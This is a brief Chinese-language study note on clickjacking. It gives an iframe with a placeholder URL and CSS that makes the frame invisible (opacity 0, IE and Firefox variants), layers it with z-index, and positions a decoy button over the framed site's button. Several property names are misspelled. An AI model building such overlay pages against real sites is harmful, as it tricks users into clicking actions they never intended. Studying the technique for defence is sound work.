点击劫持漏洞
点击劫持:一个其他的网站,用iframe标签,<iframe src=”http://xxx.xxx.xxx”></ifame>
<style>
Html,body,iframe{
Display:block; 此处可以设为null
Height:100%;
Width:100%;
Margin:0; margin和padding是元素间距离
Padding:0;
Border:nonne; 去掉边框
}
</style>
点击劫持:通过覆盖不可见的框架误导受害者点击而造成的攻击行为。
(UI覆盖攻击)
利用iframe或其他标签的属性。
Iframe{
Opacity:0; 透明度 此处可以去掉因为下面那一行有了
Filter:alpha(opacity=0); IE
-moz-opacity:0; 支持CSS3的浏览器(FF1.5也支持)
Position:absolute
Z-index:2;
}
Button{ 诱惑力图片中的点击按钮 与背后的网站按钮对应
Position:absoulte;
Top:-5px; //图片与浏览器垂直的距离
Left:875px;
Z-index:1; //值越大越接近视觉距离
Width:72px;
Height:26px;
}